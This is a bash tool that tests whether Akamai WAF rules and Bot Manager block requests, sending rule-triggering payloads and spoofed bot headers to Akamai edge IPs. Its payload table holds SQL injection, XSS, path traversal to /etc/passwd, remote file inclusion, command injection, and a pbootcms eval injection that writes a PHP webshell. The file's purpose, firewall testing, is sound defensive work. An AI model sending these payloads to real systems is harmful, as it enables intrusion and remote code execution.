#! /bin/bash function logo() { echo " _ _ " echo " | | | | " echo " ___| |__ ___ ___| | _____ _ __ " echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|" echo "| (__| | | | __/ (__| < __/ | " echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0" echo "" } function help() { logo echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier" echo "Please check the information below in order to configure the proper parameters." echo echo "checker.sh -c [] -r [] -v -e -d -m" echo "" echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option" echo "" echo "Optional:" echo "-r Identifier added to the referer header to filter in WSA." echo "-v Verbose mode." echo "-e Export results to a CSV file." echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)." echo "-m Print manual." echo "" } function helpconf() { logo echo "This script reads a configuration file that uses the following 6 block of data per line:" echo "" echo "[type] [environment] [method] [URL] [path] [arguments(optional)]" echo "" echo "Examples:" echo "atg p GET http://www.{akamaized domain}.com / krs-cmd" echo "bms s GET http://www.{akamaized domain}.com / aka-arb" echo "bmp p POST http://www.{akamaized domain}.com / foo=bar" echo "man s GET http://www.{akamaized domain}.com /?foo=bar" echo "man p POST http://www.{akamaized domain}.com / foo=bar" echo "" echo "Available options:" echo "--------------------------------------------------------------------------------------" echo "type The type of control that will be tested, options are:" echo " atg -- WAF Attack Groups" echo " bms -- Bot Manager Standard" echo " bmp -- Bot Manager Premier" echo " man -- Manual test" echo "environment Destination of the request to be generated, options are:" echo " s -- Staging environment" echo " p -- Production environment" echo "method Method expected on Akamai for the tested URL, options are: GET or POST" echo "url URL to test, the protocol (http or https) needs to be used" echo "path Path to test (use / if no specific path)" echo "arguments For atg:" echo " krs-cmd -- Command Injection" echo " krs-xss -- Cross-Site Scripting" echo " krs-dos -- DDOS" echo " krs-iht -- Invalid HTTP" echo " krs-php -- PHP Injection" echo " krs-rfi -- Remote File Inclusion" echo " krs-sql -- SQL Injection" echo " krs-trj -- Trojan" echo " aag-wat -- Web Attack Tool" echo " aag-wpr -- Web Protocol Attack" echo " aag-sql -- SQL Injection" echo " aag-xss -- Cross-Site Scripting" echo " aag-lfi -- Local File Inclusion" echo " aag-rfi -- Remote File Inclusion" echo " aag-cmi -- Command Injection" echo " aag-wpl -- Web Platform Attack" echo " penalty -- Penalty test (no attack)" echo " For bms:" echo " aka-arb -- Academic or Research Bots" echo " aka-asc -- Automated Shopping Cart and Sniper Bots" echo " aka-bib -- Business Intelligence Bots" echo " aka-eco -- E-Commerce Search Engine Bots" echo " aka-eag -- Enterprise Data Aggregator Bots" echo " aka-fia -- Financial Account Aggregator Bots" echo " aka-fis -- Financial Services Bots" echo " aka-job -- Job Search Engine Bots" echo " aka-mda -- Media or Entertainment Search Bots" echo " aka-new -- News Aggregator Bots" echo " aka-onl -- Online Advertising Bots" echo " aka-rss -- RSS Feed Reader Bots" echo " aka-seo -- SEO, Analytics or Marketing Bots" echo " aka-sit -- Site Monitoring and Web Development Bots" echo " aka-soc -- Social Media or Blog Bots" echo " aka-war -- Web Archiver Bots" echo " aka-wse -- Web Search Engine Bots" echo " tra-ikb -- Impersonators of Known Bots" echo " tra-dvf -- Development Frameworks" echo " tra-htl -- HTTP Libraries" echo " tra-wsl -- Web Services Libraries" echo " tra-osc -- Open Source Crawlers/Scraping Platforms" echo " tra-hbt -- Headless Browsers/Automation Tools" echo " tra-dcb -- Declared Bots (Keyword Match)" echo " tra-agc -- Aggressive Web Crawlers" echo " tra-req -- Request Anomaly" echo " act-cok -- Cookie Integrity Failed" echo " For bmp:" echo " List of body parameters used by the endpoint (if any)" echo " For man:" echo " If using POST, list of body parameters" } function readconfig { if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi while IFS=' ' read -ra line || [ -n "$line" ]; do [[ "$line" =~ ^(#.*|^$)$ ]] && continue for i in "${line[@]}"; do test_string+=("$i") done if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi test_string[3]='http://'$property'.akamai-lab.com' # echo $test_string[3] protocol="" sleepsec=5 if [[ ${test_string[3]} =~ ^http:// ]]; then host=${test_string[3]:7}; protocol=${test_string[3]:0:4}; fi if [[ ${test_string[3]} =~ ^https:// ]]; then host=${test_string[3]:8}; protocol=${test_string[3]:0:5}; fi if [[ $host == '' ]]; then echo "Oops... did't find any valid protocol." exit fi env="" if [[ ${test_string[1]} == 'p' ]]; then env="Production" if [[ $protocol == 'http' ]]; then resolve 1; fi if [[ $protocol == 'https' ]]; then resolve 2; fi elif [[ ${test_string[1]} == 's' ]]; then env="Staging" if [[ $protocol == 'http' ]]; then resolve 3; fi if [[ $protocol == 'https' ]]; then resolve 4; fi else echo "Oops... not a valid environment." exit fi test_string=() if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi sleep $sleepsec done < "$filecnf" } function resolve() { xpass=0 if [[ $1 == 1 ]]; then if [[ $PFIP == '' ]]; then dig="dig +short $PFFQ | tail -n1" PFIPi=$(eval $dig) if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi else if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi if [[ $xpass == 1 ]]; then iparray=(${PFIP//:/ }) PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" fi if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi fi curl $PFIPi elif [[ $1 == 2 ]]; then if [[ $PEIP == '' ]]; then dig="dig +short $PEFQ | tail -n1" PEIPi=$(eval $dig) if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi else if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi if [[ $xpass == 1 ]]; then iparray=(${PEIP//:/ }) PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" fi if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi fi curl $PEIPi elif [[ $1 == 3 ]]; then if [[ $SFIP == '' ]]; then dig="dig +short $SFFQ | tail -n1" SFIPi=$(eval $dig) if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi else if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi if [[ $xpass == 1 ]]; then iparray=(${SFIP//:/ }) SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" fi if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi fi curl $SFIPi elif [[ $1 == 4 ]]; then if [[ $SEIP == '' ]]; then dig="dig +short $SEFQ | tail -n1" SEIPi=$(eval $dig) if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi else if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi if [[ $xpass == 1 ]]; then iparray=(${SEIP//:/ }) SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" fi if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi fi curl $SEIPi fi } function exportcsv() { if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi export_payload="" export_type="" for i in ${!ACRONYMA[@]}; do if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi done if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv" } function payload { PARAMHOLDER="?id=1" HEADERHOLDER1="" HEADERHOLDER2="" HEADERHOLDER3="" rules=(${1//:/ }) for i in ${!rules[@]}; do case ${rules[$i]} in "950002") PARAMHOLDER+="&p=powershell.exe"; ;; "950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;; "950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;; "950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;; "950907") PARAMHOLDER+="&p=wget"; ;; "3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;; "3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;; "3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;; "3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;; "3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;; "3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;; "3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;; "3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;; "3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;; "3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;; "3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;; "3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;; "3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;; "3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;; "3000065") H10="Content-Type: text/xml"; DATAHOLDER='%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;; "3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;; "3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;; "950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;; "958000") PARAMHOLDER+="&p=.addimport"; ;; "958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;; "958002") PARAMHOLDER+="&p=.execscript"; ;; "958003") PARAMHOLDER+="&p=.fromcharcode"; ;; "958004") PARAMHOLDER+="&p=.innerhtml"; ;; "958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;; "958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;; "958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;; "958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;; "958009") PARAMHOLDER+="&p=%40import"; ;; "958010") PARAMHOLDER+="&p=activexobject"; ;; "958011") PARAMHOLDER+="&p=background-image%3A"; ;; "958012") PARAMHOLDER+="&p=copyparentfolder"; ;; "958013") PARAMHOLDER+="&p=createtextrange"; ;; "958016") PARAMHOLDER+="&p=getparentfolder"; ;; "958017") PARAMHOLDER+="&p=getspecialfolder"; ;; "958018") PARAMHOLDER+="&p=href%20javascript%3A"; ;; "958019") PARAMHOLDER+="&p=href%20shell%3A"; ;; "958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;; "958022") PARAMHOLDER+="&p=livescript%3A"; ;; "958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;; "958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;; "958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;; "958026") PARAMHOLDER+="&p=mocha%3A"; ;; "958027") PARAMHOLDER+="&p=onabort"; ;; "958028") PARAMHOLDER+="&p=settimeout%20("; ;; "958030") PARAMHOLDER+="&p=src%20http%3A"; ;; "958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;; "958032") PARAMHOLDER+="&p=src%20shell%3A"; ;; "958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;; "958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;; "958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;; "958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;; "958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;; "958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;; "958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;; "958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;; "958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;; "958046") PARAMHOLDER+="&p=url%20shell%3A"; ;; "958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;; "3000036") PARAMHOLDER+="&foo&msg=bar"; ;; "950116") PARAMHOLDER="%ufF12/"; ;; "950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;; "950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;; "950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;; "958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;; "958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;; "958291") HEADERHOLDER1="Range: bytes=0-"; ;; "958295") HEADERHOLDER1="Connection: keep-alive,close"; ;; "960006") H9="User-Agent;"; ;; "960007") H6="Host;"; ;; "960008") H6="Host:"; ;; "960009") H9="User-Agent:"; ;; "960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; ;; "960011") HEADERHOLDER2="Content-Length: 1000"; ;; "960012") HEADERHOLDER2="Content-Length:"; ;; "960016") HEADERHOLDER2="Content-Length: checker"; ;; "960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;; "960034") PROTOCOLHOLDER="--httpX.X"; ;; "960038") HEADERHOLDER1="Content-Range: test"; ;; "960901") PARAMHOLDER+="&one=more"; ;; "960902") HEADERHOLDER3="Content-Encoding: Identity"; ;; "958976") PARAMHOLDER+="¤t={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;; "958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;; "959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;; "3000003") PARAMHOLDER+="&p=base64_decode("; ;; "3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;; "950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;; "950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; "950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;; "950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; "950001") PARAMHOLDER+="&p=dbms_java"; ;; "950007") PARAMHOLDER+="&p=attnotnull"; ;; "950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;; "950908") PARAMHOLDER+="&p=coalesce"; ;; "959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;; "959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;; "959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;; "959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;; "981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;; "950110") HEADERHOLDER1="x_file: test"; ;; "950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;; "watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;; "wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;; "sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;; "xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;; "lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;; "rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;; "cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;; "wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;; *) PARAMHOLDER="" ; ;; esac done } function curl { shopt -s nocasematch if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi COOKIEHOLDER="" HEADERHOLDER1="Connection: keep-alive" HEADERHOLDER2="" PARAMHOLDER="" PATHHOLDER="" DATAHOLDER="{'foo':'bar'}" UAHOLDER="" PROTOCOLHOLDER="--http2" if [ -z "$fileref" ]; then epoch=$(date +%s); else epoch=$fileref; fi H1="Accept: application/json" H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5" H3="Accept-Language: en-US,en;q=1.0" H4="Cache-Control: no-cache" H5="Cookie: foo=bar;" H6="Host: $host" H7="Origin: ${test_string[3]}" H8="Referer: $epoch" H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker" H10="Content-Type: text/plain" if [ ${test_string[0]} = 'atg' ]; then if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi case ${test_string[5]} in "krs-cmd") payload "950002:950006:950011:950103:950907:3000005";; "krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;; "krs-dos") payload "3000036"; ;; "krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;; "krs-php") payload "958976:958977:959151:3000003:3000016"; ;; "krs-rfi") payload "950117:950118:950119:950120"; ;; "krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;; "krs-trj") payload "950110:950921"; ;; "aag-wat") payload "watatomic"; ;; "aag-wpr") payload "wpratomic"; ;; "aag-sql") payload "sqlatomic"; ;; "aag-xss") payload "xssatomic"; ;; "aag-lfi") payload "lfiatomic"; ;; "aag-rfi") payload "rfiatomic"; ;; "aag-cmi") payload "cmiatomic"; ;; "aag-wpl") payload "wplatomic"; ;; "penalty") payload ""; ;; *) echo -e 'Oops... invalid argument!'; exit; ;; esac elif [ ${test_string[0]} = 'bms' ]; then if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi case ${test_string[5]} in "aka-arb") UAHOLDER+=" lightspeedsystems"; ;; "aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;; "aka-bib") UAHOLDER+=" companybooknetworking.com"; ;; "aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;; "aka-eag") UAHOLDER+=" shrinktheweb.com"; ;; "aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;; "aka-fis") UAHOLDER+=" drwholdings.com"; ;; "aka-job") UAHOLDER+=" motorelavoro.it"; ;; "aka-mda") UAHOLDER+=" localconditions.com"; ;; "aka-new") UAHOLDER+=" reader.aol.com"; ;; "aka-onl") UAHOLDER+=" integralads.com"; ;; "aka-rss") UAHOLDER+=" pocketcasts.com"; ;; "aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;; "aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;; "aka-soc") UAHOLDER+=" socialrank.io"; ;; "aka-war") UAHOLDER+=" europarchive.org"; ;; "aka-wse") UAHOLDER+=" femtosearch.com"; ;; "tra-ikb") UAHOLDER+=" amazon route 53"; ;; "tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;; "tra-htl") UAHOLDER+=" winhttprequest"; ;; "tra-wsl") UAHOLDER+=" httpful"; ;; "tra-osc") UAHOLDER+=" mercury.postlight.com"; ;; "tra-hbt") UAHOLDER+=" prerender"; ;; "tra-dcb") UAHOLDER+=" semantic"; ;; "tra-agc") UAHOLDER+=" openhose.org"; ;; "tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;; "act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;; *) echo -e 'Oops... invalid argument!'; exit; ;; esac elif [ ${test_string[0]} = 'bmp' ]; then if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi if [[ ${test_string[5]} != '' ]]; then DATAHOLDER="${test_string[5]}" fi test_string[5]="BMP"; elif [ ${test_string[0]} = 'man' ]; then if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi test_string[5]="Manual"; else if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi fi description=""; if [ ${test_string[5]} = 'aka-arb' ]; then description="Academic or Research Bots" elif [ ${test_string[5]} = 'aka-seo' ]; then description="SEO, Analytics or Marketing Bots" elif [ ${test_string[5]} = 'aka-eco' ]; then description='E-Commerce Search Engine Bots' elif [ ${test_string[5]} = 'tra-ikb' ]; then description='Impersonators of Known Bots' elif [ ${test_string[5]} = 'tra-hbt' ]; then description='Headless Browsers/Automation Tools' elif [ ${test_string[5]} = 'act-cok' ]; then description='Cookie Integrity Failed' else description='not equal'; fi export now=$(date) echo -e "\t $now : [ $env ] [ $description ]" H9+=${UAHOLDER} H5+=${COOKIEHOLDER} URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}" CURL='/usr/bin/curl' CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1" echo -e "${test_string[3]}${test_string[4]}" if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp else if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp fi echo "checker" >> .temp regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})' regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)' regexdie='.*doctype.*|^(^$)$' stopv=0 http="Timeout" refe="Unable to get AK_REFERENCE_ID" while IFS= read -r liner; do liner="${liner//./.}" liner="${liner//#/#}" if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi done < .temp echo -e "${http}" # echo -e "${epoch}" # echo -e "${refe}" echo -e "" if [[ ${filetim} != '' ]]; then exportcsv; fi else echo -e 'Oops... wrong method!' exit fi } property=$3 verbose=0 filetim=""; filecnf=""; fileref="" PFIPi=""; PEIPi=""; SFIPi=""; SEIPi="" PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208" PEIP="72.246.84.4:23.40.180.4:23.48.16.4" SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51" SEIP="23.199.36.2:23.34.4.4:23.59.184.2" PFFQ="a1.g.akamai.net" PEFQ="e1.a.akamaiedge.net" SFFQ="a1.g.akamai-staging.net" SEFQ="e1.a.akamaiedge-staging.net" rules=() headerorder=() while getopts "c:r:vedm" option; do case $option in c) filecnf=${OPTARG};; v) verbose=1 ;; r) fileref=${OPTARG};; e) filetim=$(date +%s) ;; d) PFIP="" PEIP="" SFIP="" SEIP="";; m) helpconf exit;; esac done if (( $OPTIND == 1 )); then help exit fi if [[ ${filetim} != '' ]]; then export_type="" export_payload="" ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok') ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 